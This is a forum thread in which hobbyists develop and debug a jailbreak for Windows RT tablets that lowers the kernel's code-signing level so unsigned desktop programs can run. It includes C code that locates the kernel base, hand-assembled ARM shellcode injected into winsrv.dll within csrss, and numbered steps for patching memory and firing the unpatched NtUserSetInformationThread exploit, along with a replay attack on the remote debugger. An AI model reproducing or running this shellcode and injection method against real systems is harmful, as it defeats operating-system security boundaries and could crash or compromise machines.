[Q] Hacking Windows RT to Run Desktop Apps?

Search This thread

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
CotullaCode (The guy who ported WP7, WP8 and Windows 8 RT on the HTC HD2) managed to compile and run 7Zip on the Surface, I asked him how, here are his answers :

https://twitter.com/CotullaCode/status/287271124222492673
https://twitter.com/CotullaCode/status/287270807179231233

But, what is this LEORT thing ? (I'll try to find out myself until someone answers...)

He ported Windows RT to the HTC HD2, also known as the HTC Leo. Since he has full bootloader control he can disable secureboot at will.

It's of no use to us.
 

clrokr

Senior Member
Aug 2, 2009
69
54
Okay you guys, I found a way to change the required signing level. I'm trying to figure out how to automate this so everybody can profit. You basically use VS2012 to edit the last code page of a module that runs in CSRSS's process. Insert some hand-assembled ARM opcodes to trigger the (still not patched) exploit in NtUserSetInformationThread, set a breakpoint somewhere specific and hit it, then modify this instruction pointer PC to point to the hand assembled code. Boom.

As you can see, this is not quite ready for the general public.

I have built a proof of concept that loads ntoskrnl as an image resource and scans through the code segment to find the literal that points to the value we need to change. Using this offset and NtQuerySystemInformation it calculates the linear address of the byte that needs to be zeroed out and fixes the alignment.

Note that using the hand assembled code we can easily trigger the exploit 524288 times which would be impractical otherwise.

You can however set a trace point in VS2012 that displays a message and use the evaluation function to change memory just before NtUserSetInformationThread is called. For example, the last call to NtUserSetInformationThread in TerminalServerRequestThread is perfect for this. It hits every time you press a volume button. I got the signature level down from 8 (the address read 0x00080101) to 7 by pressing a volume button very often.

So, stay prepared.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
Okay you guys, I found a way to change the required signing level. I'm trying to figure out how to automate this so everybody can profit. You basically use VS2012 to edit the last code page of a module that runs in CSRSS's process. Insert some hand-assembled ARM opcodes to trigger the (still not patched) exploit in NtUserSetInformationThread, set a breakpoint somewhere specific and hit it, then modify this instruction pointer PC to point to the hand assembled code. Boom.

As you can see, this is not quite ready for the general public.

I have built a proof of concept that loads ntoskrnl as an image resource and scans through the code segment to find the literal that points to the value we need to change. Using this offset and NtQuerySystemInformation it calculates the linear address of the byte that needs to be zeroed out and fixes the alignment.

Note that using the hand assembled code we can easily trigger the exploit 524288 times which would be impractical otherwise.

You can however set a trace point in VS2012 that displays a message and use the evaluation function to change memory just before NtUserSetInformationThread is called. For example, the last call to NtUserSetInformationThread in TerminalServerRequestThread is perfect for this. It hits every time you press a volume button. I got the signature level down from 8 (the address read 0x00080101) to 7 by pressing a volume button very often.

So, stay prepared.

Any chance you could do a (more detailed) writeup of how to do it so we can start on automating it? I'll look at getting authentication going with the remote debugger from a metro app for now.

Edit: I was able to connect to the debugger with authentication disabled, though I'm just replaying the packets right now.
 
Last edited:

clrokr

Senior Member
Aug 2, 2009
69
54
Any chance you could do a (more detailed) writeup of how to do it so we can start on automating it? I'll look at getting authentication going with the remote debugger from a metro app for now.

Reversing the protocol could be hard. I'm thinking about some kind of replay attack. The user would have to run my TIFKAM app that spits out the right address, fire up the Remote Debugger Monitor as administrator and then the app can connect via loopback and play the sequence.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
Reversing the protocol could be hard. I'm thinking about some kind of replay attack. The user would have to run my TIFKAM app that spits out the right address, fire up the Remote Debugger Monitor as administrator and then the app can connect via loopback and play the sequence.

That's exactly what I'm looking at right now.

As far as the protocol goes, it actually doesn't seem too hard. I've got it connecting and requesting a task list, which is basically a tab seperated spreadsheet (0x01 = tab, 0x02 = new row). It even has labeled headers. Granted, I'm just replaying the connection part.

The only issue about doing a complete replay attack is that things like the PID and such are going to change, we're going to need those.

But, if you could post some more information on what you're doing (as in, how to do it), I could get that going.
 
Last edited:

clrokr

Senior Member
Aug 2, 2009
69
54
But, if you could post some more information on what you're doing (as in, how to do it), I could get that going.

I'm working on that. In the meantime, some good news. I managed to run my own desktop program, unsigned and everything. We have to compile the release version because the Surface doesn't come with debug runtime libs for C++.

One thing though: we need to attach to csrss.exe because the exploit depends on it. I don't think this is possible locally because stopping csrss effectively stops the computer (well, the whole Windows subsystem) and we can't send the network packages to continue.
 
  • Like
Reactions: netham45

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
I'm working on that. In the meantime, some good news. I managed to run my own desktop program, unsigned and everything. We have to compile the release version because the Surface doesn't come with debug runtime libs for C++.

One thing though: we need to attach to csrss.exe because the exploit depends on it. I don't think this is possible locally because stopping csrss effectively stops the computer (well, the whole Windows subsystem) and we can't send the network packages to continue.

Sign on as a different user to spawn another instance of CSRSS, then attach it from the first user?
 

clrokr

Senior Member
Aug 2, 2009
69
54
Excellent. Any chance you could post the app you're using to get the kernel's base address? Would be very appreciated.
Sorry, no. I don't trust MSFT's compiler, it may include some licensing info in the binaries. But it's really easy, you call NtQuerySystemInformation with information class 11 and make the output buffer really big (like 0x20000). The structure is easily recognizable when viewing the memory.
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
Sorry, no. I don't trust MSFT's compiler, it may include some licensing info in the binaries. But it's really easy, you call NtQuerySystemInformation with information class 11 and make the output buffer really big (like 0x20000). The structure is easily recognizable when viewing the memory.

Code:
#include <Windows.h>
#include <iostream>

typedef struct _SYSTEM_MODULE {
  ULONG                Reserved1;
  ULONG                Reserved2;
  PVOID                ImageBaseAddress;
  ULONG                ImageSize;
  ULONG                Flags;
  WORD                 Id;
  WORD                 Rank;
  WORD                 w018;
  WORD                 NameOffset;
  BYTE                 Name[255];
} SYSTEM_MODULE, *PSYSTEM_MODULE;

typedef struct _SYSTEM_MODULE_INFORMATION {
  ULONG                ModulesCount;
  SYSTEM_MODULE        Modules[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef NTSTATUS (NTAPI *_NtQuerySystemInformation) (
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength OPTIONAL
);

BOOL GetKernelBase()
{
	_NtQuerySystemInformation NtQuerySystemInformation;
	PSYSTEM_MODULE_INFORMATION pModuleInfo;
	ULONG i,len;
	NTSTATUS ret;
	HMODULE ntdllHandle;

	ntdllHandle = GetModuleHandle(L"ntdll");
	if (!ntdllHandle)
		return false;
	NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(ntdllHandle,"NtQuerySystemInformation");
	if (!NtQuerySystemInformation)
		return false;
	NtQuerySystemInformation(11,NULL,0,&len);
	pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
	NtQuerySystemInformation(11,pModuleInfo,len,&len);

	for (i=0;i<pModuleInfo->ModulesCount;i++)
	{
		if (strcmp((const char*)pModuleInfo->Modules[i].Name,"\\SystemRoot\\system32\\ntoskrnl.exe") == 0)
			printf("[*] Driver Entry: %s at %p\n",pModuleInfo->Modules[i].Name,pModuleInfo->Modules[i].ImageBaseAddress);
	}
	return true;
}

int main()
{
	GetKernelBase();
	system("pause");
	return 0;
}

If anyone else needs it.

Edit: Just getting a BSoD with this. Here's what I'm doing:
1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source
3) armasm -o exploit.o exploit.asm
4) Taking the code starting at 0x64 (push r5) and putting it in Winsrv.dll!0x10800
5) Placing a breakpoint right after 'bl NtUserSetInformationThread (75475134h)' (Note that there are two calls to NtUserSetInformationThread, I've tried putting the break right after both)
6) Placing a breakpoint at mov r0,r0 at Winsrv.dll!0x10800
7) Resuming CSRSS
8) Hitting vol down
9) Moving PC to Winsrv.dll!0x10800
10) Resume, at this point I BSoD.

I've checked, and it BSoD's on the 'svc 1' line, citing csrss dying.

Here are the registers going into svc 1:
Code:
R0  *=*FFFFFFFE R1  *=*00000009 R2  *=*0117FCA0 R3  *=*0000000C R4  *=*00000013 R5  *=*0117FCA4 R6  *=*00000000 R7  *=*00080000 R8  *=*8381E000 R9  *=*755D1118 R10 *=*755D7A50 R11 *=*0117FCF8 R12 *=*000010E1 SP  *=*0117FC38 LR  *=*755C3645 PC  *=*755D0822 CPSR*=*00000030
 
Last edited:
  • Like
Reactions: peterdn

peterdn

Member
Sep 19, 2010
36
11
Oxford
Looking great guys!

1) Get kernel base w/ app higher in post
2) Put base in the my_addr field in the source

Fyi, I believe that my_addr should actually contain the address of the word we want to modify, i.e. in this case nt+0x19ffa4.

Otherwise I ran through those steps exactly and I'm getting the 0x18 REFERENCE_BY_POINTER bugcheck as described at the end of clrokr's blog post.

For every dump I have, address nt+0x19ffa4 contains the value 0x00080101. Does that look like what you guys have?
 

clrokr

Senior Member
Aug 2, 2009
69
54
@netham45:
You need to add 0x18 to the address you supply in your step 2), because ObfDereferenceObject subtracts 0x18 from it, so it changes the wrong address in your case. I updated the article accordingly.
@peterdn:
0x00080101 looks right and is the reason we can do this without a bluescreen.
 
Last edited:

peterdn

Member
Sep 19, 2010
36
11
Oxford
@netham45:
You need to add 0x18 to the address you supply in your step 2), because ObfDereferenceObject subtracts 0x18 from it, so it changes the wrong address in your case. I updated the article accordingly.

Oops, I forgot to add the 0x18 as well.

Will have another go in a few minutes.

EDIT: works beautifully :)
 
Last edited:

peterdn

Member
Sep 19, 2010
36
11
Oxford
Utterly fantastic. Managed to compile PuTTY with not much trouble and it runs perfectly!

lWKjp.png
 

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
I just tried a simple pure .net program (Form with a label on it) and the same .exe works on both my desktop and my tablet. I can't believe MS locked this out.

Edit: Oddly enough, running from a metro app has debug dlls, while running from desktop doesn't.
 
Last edited:

clrokr

Senior Member
Aug 2, 2009
69
54
Utterly fantastic. Managed to compile PuTTY with not much trouble and it runs perfectly!

Awesome! Try out more open source stuff, I know I will.

I just tried a simple pure .net program (Form with a label on it) and the same .exe works on both my desktop and my tablet. I can't believe MS locked this out.

I really don't get how the people on Reddit are so against having desktop apps on their devices. It works flawlessly. Probably a bad case of Reddit Reverse Psychology :)

It honestly just feels like my Surface's value has magically increased by $300.
 
  • Like
Reactions: Griffinx

netham45

Inactive Recognized Developer
Jun 24, 2009
886
569
Denver
I seem to be missing a number of libs required for things like putty and the such, any clues on where they are?

Code:
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_DeleteDC referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_DeleteDC
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_GetTextExtentPoint32A referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_GetTextExtentPoint32A
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_SelectObject referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_SelectObject
7>window.obj : error LNK2001: unresolved external symbol __imp_SelectObject
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_CreateCompatibleDC referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_CreateCompatibleDC
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_DeleteObject referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_DeleteObject
7>window.obj : error LNK2001: unresolved external symbol __imp_DeleteObject
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_TextOutA referenced in function SizeTipWndProc
7>winctrls.obj : error LNK2001: unresolved external symbol __imp_TextOutA
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_SetBkColor referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_SetBkColor
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_SetTextColor referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_SetTextColor
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_Rectangle referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_Rectangle
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_CreateSolidBrush referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_CreateSolidBrush
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_GetStockObject referenced in function SizeTipWndProc
7>window.obj : error LNK2001: unresolved external symbol __imp_GetStockObject
7>sizetip.obj : error LNK2019: unresolved external symbol __imp_CreateFontIndirectA referenced in function UpdateSizeTip
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_SetMapMode referenced in function staticwrap
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_GetDeviceCaps referenced in function staticwrap
7>window.obj : error LNK2001: unresolved external symbol __imp_GetDeviceCaps
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_GetTextExtentExPointA referenced in function staticwrap
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_LBItemFromPt referenced in function pl_itemfrompt
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_CreateFontA referenced in function dlg_auto_set_fixed_pitch_flag
7>window.obj : error LNK2001: unresolved external symbol __imp_CreateFontA
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_GetTextMetricsA referenced in function dlg_auto_set_fixed_pitch_flag
7>window.obj : error LNK2001: unresolved external symbol __imp_GetTextMetricsA
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_MakeDragList referenced in function prefslist
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_DrawInsert referenced in function handle_prefslist
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_ChooseFontA referenced in function winctrl_handle_command
7>winctrls.obj : error LNK2019: unresolved external symbol __imp_ChooseColorA referenced in function winctrl_handle_command
7>windlg.obj : error LNK2019: unresolved external symbol __imp_ShellExecuteA referenced in function AboutProc
7>window.obj : error LNK2019: unresolved external symbol __imp_CreatePalette referenced in function init_palette
7>window.obj : error LNK2019: unresolved external symbol __imp_SelectPalette referenced in function init_palette
7>window.obj : error LNK2019: unresolved external symbol __imp_RealizePalette referenced in function init_palette
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharacterPlacementW referenced in function exact_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_ExtTextOutA referenced in function exact_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharABCWidthsFloatA referenced in function get_font_width
7>window.obj : error LNK2019: unresolved external symbol ImmGetContext referenced in function sys_cursor_update
7>window.obj : error LNK2019: unresolved external symbol ImmSetCompositionWindow referenced in function sys_cursor_update
7>window.obj : error LNK2019: unresolved external symbol ImmReleaseContext referenced in function sys_cursor_update
7>window.obj : error LNK2019: unresolved external symbol __imp_SetPaletteEntries referenced in function real_palette_set
7>window.obj : error LNK2019: unresolved external symbol __imp_ExtTextOutW referenced in function general_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_SetBkMode referenced in function general_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_GetBkMode referenced in function general_textout
7>window.obj : error LNK2019: unresolved external symbol __imp_GetObjectA referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_TranslateCharsetInfo referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_SetTextAlign referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_CreateCompatibleBitmap referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_GetPixel referenced in function init_fonts
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidth32A referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidthA referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidth32W referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_GetCharWidthW referenced in function char_width
7>window.obj : error LNK2019: unresolved external symbol __imp_CoUninitialize referenced in function cleanup_exit
7>window.obj : error LNK2019: unresolved external symbol __imp_UnrealizeObject referenced in function palette_set
7>window.obj : error LNK2019: unresolved external symbol __imp_GetClipBox referenced in function xEnumDisplayMonitors
7>window.obj : error LNK2019: unresolved external symbol __imp_GetDCOrgEx referenced in function xEnumDisplayMonitors
7>window.obj : error LNK2019: unresolved external symbol __imp_LineTo referenced in function do_text_internal
7>window.obj : error LNK2019: unresolved external symbol __imp_MoveToEx referenced in function do_text_internal
7>window.obj : error LNK2019: unresolved external symbol __imp_CreatePen referenced in function do_text_internal
7>window.obj : error LNK2019: unresolved external symbol __imp_PlaySoundA referenced in function do_beep
7>window.obj : error LNK2019: unresolved external symbol __imp_Polyline referenced in function do_cursor
7>window.obj : error LNK2019: unresolved external symbol __imp_SetPixel referenced in function do_cursor
7>window.obj : error LNK2019: unresolved external symbol __imp_ExcludeClipRect referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol __imp_IntersectClipRect referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol __imp_UpdateColors referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol ImmSetCompositionFontA referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol ImmGetCompositionStringW referenced in function WndProc
7>window.obj : error LNK2019: unresolved external symbol __imp_InitCommonControls referenced in function WinMain
7>window.obj : error LNK2019: unresolved external symbol __imp_CoInitialize referenced in function WinMain
7>window.obj : error LNK2019: unresolved external symbol __imp_CreateBitmap referenced in function WinMain
7>winjump.obj : error LNK2019: unresolved external symbol __imp_CoCreateInstance referenced in function make_shell_link
7>winmisc.obj : error LNK2019: unresolved external symbol __imp_GetUserNameA referenced in function get_username
7>winprint.obj : error LNK2019: unresolved external symbol EnumPrintersA referenced in function printer_add_enum
7>winprint.obj : error LNK2019: unresolved external symbol OpenPrinterA referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol StartDocPrinterA referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol StartPagePrinter referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol EndDocPrinter referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol ClosePrinter referenced in function printer_start_job
7>winprint.obj : error LNK2019: unresolved external symbol WritePrinter referenced in function printer_job_data
7>winprint.obj : error LNK2019: unresolved external symbol EndPagePrinter referenced in function printer_finish_job
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegSetValueExA referenced in function write_setting_s
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegCloseKey referenced in function close_settings_w
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegQueryValueExA referenced in function read_setting_s
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegOpenKeyA referenced in function enum_settings_start
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegEnumKeyA referenced in function registry_recursive_remove
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegDeleteKeyA referenced in function registry_recursive_remove
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegCreateKeyA referenced in function open_settings_w
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegCreateKeyExA referenced in function transform_jumplist_registry
7>winstore.obj : error LNK2019: unresolved external symbol __imp_RegDeleteValueA referenced in function transform_jumplist_registry
7>winutils.obj : error LNK2019: unresolved external symbol __imp_GetSaveFileNameA referenced in function request_file
7>winutils.obj : error LNK2019: unresolved external symbol __imp_GetOpenFileNameA referenced in function request_file

I've only spent a few minutes looking at it, though, I've got to go pretty soon.
 

Top Liked Posts

  • There are no posts matching your filters.
  • 17
    This would be fantastic.

    Other than one bug I just tracked down I've got everything except getting the kernel base automated in a batch file + debugger.

    Edit: Here's what I've got so far. To use:

    1) Install the app in the top of THIS thread (Sorry, you'll have to compile it for now, I'm working on a clean app I can package, but it's not ready yet)
    2) Copy the 'getKernelBase.exe' from the ZIP attached to this post to the folder it installs to (%userprofile%\appxlayouts\<appname>)
    3) Run the app, click the button
    4) Click OK on the prompt, type 'getKernelBase' into the command prompt. If it doesn't do anything, snap the app to the side of your screen.
    5) Keep the 4 numbers it gives you
    6) Open 'runExploit.bat' as an administrator
    7) Put those 4 numbers in there, make sure you keep the spaces between them
    8) Press enter
    9) Press Volume Down
    10) Press enter again
    11) You should be jailbroken now.

    And a writeup for what I'm doing for my hack:
    It's mainly the same basic hack as clrokr, but I found a way that I could write process memory using cdb (but, I can't attach as a debugger, so I lose breakpoints)

    I change winsrv.dll+0x3644 to redirect to winsrv.dll+0x10800

    I inject this modified payload at winsrv.dll+0x10800:
    Code:
    	push {r5-r8}
    	mov r7, 0x80000
    	ldr r8, my_addr
    loc_loop_begin
    	movs r3, 0xC
    	add r2, sp, 0x68 ;0x58 org.
    	add r5, r2, 4
    	str r8, [r5]
    	movs r1, 9
    	mvn r0, 1
    	mov r12, 0x10E1
    	svc 1
    	subs r7, r7, 1
    	cmp r7, 0
    	bne loc_loop_begin
    	pop {r5-r8}
    	mov r7, r0
    endloop
    	cmp r7,#0
    	b endloop
    	b -0xD1E6
    my_addr dcd 0x<Kernel Base>
    	end

    That then gets called when you press vol down. It hangs at the loop at the end so it doesn't execute the exploit twice (which would crash the tablet)

    I then reset winsrv.dll+0x3644 back to default
    Once it's default, I zero out 'b endloop', allowing it to progress to the b -0xD1E6 and resume execution

    cdb -pvr <pid> attaches to <pid> in non-invasive mode, which grants the ability to see loaded modules and change ram but not debug (pause, resume, break, manage breakpoints, get debug events), since there's no debugger actually attaching. That's why it works on the ARM too.

    And that's it.


    Edit: I missed something, it's not working in the zip. I'll check it real fast.
    More edit: I see what I did, fix in a couple minutes.
    Even more edit: Should be fixed, the offset I had at the bottom of the payload was off by 0x6.
    Super edit: Nope, something is still up. It works perfectly if the debugger is attached to csrss, but if not it crashes. =/
    Super-duper edit: seems to work intermittently, I'm not 100% sure why it crashes some of the time, though.
    Mega Edit: One of the offsets I'm using changes randomly between a few different possibilities, I'll see if I can come up with some way to generate the code for it.
    9
    I just got the exploit running using only on-tablet programs, I should be able to bundle it into a nice little app where you just have to click one or two things.
    9
    Got Mouse Without Borders (MS-Made Synergy-ish app) working.
    Simple guide:
    Install it on desktop
    Copy the folder out of the program files to the tablet
    Open admin command prompt on tablet
    run sc create MouseWithoutBorders binpath="c:\Path\To\MouseWithoutBordersSvc.exe" (Fix the path)
    Open services.msc, start the service you just created
    It'll then prompt to set it up.
    7
    Pardon if I misunderstood, but why *not* decrement it oh, 0x7FFF0 times? That way, if it was 0x80101, it will now be 0x00110 (which is maybe not ideal, but depending on what those other bytes represent it might still work) and if it was 0x80000, it will now be 0x0000F (which again may be less than ideal, but won't be the fully zeroed-out value).

    Working on that exact thing right now. Should have a result momentarily.

    Edit: Seems to have worked, at least for the initial test. If all goes well, I should be able to get a 100% exploit rate.

    Edit 2: 3 for 4 so far, with the one that failed being because the offset was off.

    Edit 3: Still getting a crash. Going to try 0x7EFF0 instead of 0x7FFF0.

    Edit 4: Seem to at least be getting a higher success rate with this method.

    Edit 5: Hopefully not jumping the gun, but I seem to have gotten it except in the occasions where the offset is not what I've preprogrammed. I think I've got a means to fix it when the offset is wrong, but I haven't actually managed to get a debugger attached recently when it was wrong.

    Edits are fun: I've tried it 7 times now, all worked. I've never had that success rate with it before, I'm going to call this one fixed.

    More edit: It's odd, it only seems to give the SYSTEM_SERVICE_EXCEPTION when I don't have a debugger attached. Guess I get to go dig through a memory dump. Does it make sense that the debugger would be shifting everything down (0x....3646 -> 0x....3644) just by having a debugger on?

    Edit 8: I can say with 75% certainty that I've fixed the 0x18 bugcheck.

    Edit 9: I think the bug might be caused because the debuggers I'm using in the script don't have the PDB loaded for winsrv.dll, I'm going to give it the PDB and see what it does.

    Edit 10: I've found out that the crash happens reliably if the exploit is ran within a few seconds of the system booting, it seems to work best if you wait at least a minute after logging in before running it.

    Edit 11: Please see THIS THREAD for what I believe will be the final version of my jailbreaking tool.
    7
    Okay you guys, I found a way to change the required signing level. I'm trying to figure out how to automate this so everybody can profit. You basically use VS2012 to edit the last code page of a module that runs in CSRSS's process. Insert some hand-assembled ARM opcodes to trigger the (still not patched) exploit in NtUserSetInformationThread, set a breakpoint somewhere specific and hit it, then modify this instruction pointer PC to point to the hand assembled code. Boom.

    As you can see, this is not quite ready for the general public.

    I have built a proof of concept that loads ntoskrnl as an image resource and scans through the code segment to find the literal that points to the value we need to change. Using this offset and NtQuerySystemInformation it calculates the linear address of the byte that needs to be zeroed out and fixes the alignment.

    Note that using the hand assembled code we can easily trigger the exploit 524288 times which would be impractical otherwise.

    You can however set a trace point in VS2012 that displays a message and use the evaluation function to change memory just before NtUserSetInformationThread is called. For example, the last call to NtUserSetInformationThread in TerminalServerRequestThread is perfect for this. It hits every time you press a volume button. I got the signature level down from 8 (the address read 0x00080101) to 7 by pressing a volume button very often.

    So, stay prepared.